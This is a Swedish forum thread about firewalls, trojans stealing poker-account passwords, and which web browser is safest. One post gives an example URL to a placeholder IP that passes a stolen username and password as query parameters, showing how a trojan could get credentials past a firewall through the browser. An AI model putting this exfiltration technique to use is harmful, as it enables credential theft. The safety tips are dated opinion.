Gå till innehåll

Recommended Posts

Postad

En brandvägg hindrar nätverkstrafik att komma in (och ut) från ditt hemmanät eller enda PC om du skanar hemmanät.

För att hindra trafik att komma in räcker en enkel bredbandsrouter med NAT. Den släpper inte in något om du inte öppnar upp den.

Att hindra trafik att komma ut behövs oftast inte och skapar ofta bara problem för tex spel och andra ickestandardiserade aplikationer och protokoll.

Vad gäller Poker så är det nog snarare ett virusskydd du är ute efter om du är orolig för att någon skall snappa upp ditt lösenord och tömma ditt konto med hjälp av tex en trojan. Brandväggen hjälper nog inte alls mot sådana attacker.

Annars kan jag starkt förorda sunt förnuft:

* Använd helst inte MSN, Outlook eller IE

* ladda aldrig ner saker från sajter som inte är "respektabla" eller saknar garanti för att saker är viruskollade.

* öppna aldrig attachment i email utan att först verifierat dess renhet. Skicka mailet vidare til tex yahoo-mail som kollar mailet åt dig.

Dessa åtgärder räcker oftast. Har fungerat bra för mig i alla år.

Postad
Att hindra trafik att komma ut behövs oftast inte och skapar ofta bara problem för tex spel och andra ickestandardiserade aplikationer och protokoll.

Jag har funderat på det en del. Det vore ju suveränt om man kunde hindra en trojan från att skicka ut grejer. Men är det egentligen möjligt? En trojan kan väl lika gärna använda port 80, som webbläsaren, och därmed få grönt ljus genom brandväggen?

En annan grej, om man använder en mjukvarubrandvägg som zone alarm, som kan stoppa enskilda program. Då kan ju inte trojanen komma ut på nätet. Men skulle inte en trojan kunna öppna en webbsida med standardbrowsern, säg http://123.45.67.89/trojan_report.php?party_username=killah&party_password=badaboom? För browsern seglar ju vanligtvis rakt genom brandväggen.

Sorry om jag kidnappar tråden. Men det var ju inte helt off topic ändå. :)

Postad

Ingenting som hindrar att man använder port 80 för att komma runt en hårdvarubrandvägg så länge hackaren har satt upp sin server att svara på port 80. För att säkra upp detta så kan man sätta upp de flesta brandväggar som proxy.

Väldigt många mjukvarubrandväggar detekterar om ett program startar upp ett annat program.

Postad

IE har mer hål än en schweizerost. ;)

Ärligt talat, felet med IE är att det är så hårt knutet till operativet, och att kontrollen av java/applets osv är bristande. Firefox gör det ju iallafall lite svårare att hitta hitta hålen. Om man måste besöka sidor som inte fungerar med firefox så kan jag rekomendera IE Tabs som extension till FF.

Postad
IE har mer hål än en schweizerost. ;)

Ärligt talat, felet med IE är att det är så hårt knutet till operativet, och att kontrollen av java/applets osv är bristande. Firefox gör det ju iallafall lite svårare att hitta hitta hålen. Om man måste besöka sidor som inte fungerar med firefox så kan jag rekomendera IE Tabs som extension till FF.

Du har helt fel. Det finns lika mycket luckor i alla webbläsare, men då IE är så stor, så kommer givetvis alla finniga hackers att rikta in sig på IE. Det är givetvis därför som det upptäcks mest säkerhetsluckor i IE.

Det går att ställa in IE, så att den inte laddar ActiveX, skripts osv. Då har du i princip en webbläsare i samma klass om Opera och FF.

Tro nu inte att jag använder IE, ty det gör jag inte. Jag kör Opera och kommer att fortsätta med det, då Opera är så jäkla konfigurerbar. FF har blivit alltför stor och är bloatat. Dock blir jag upprörd, då folk bashar IE utan att ha koll på läget, dvs. sprider saker som inte sanna.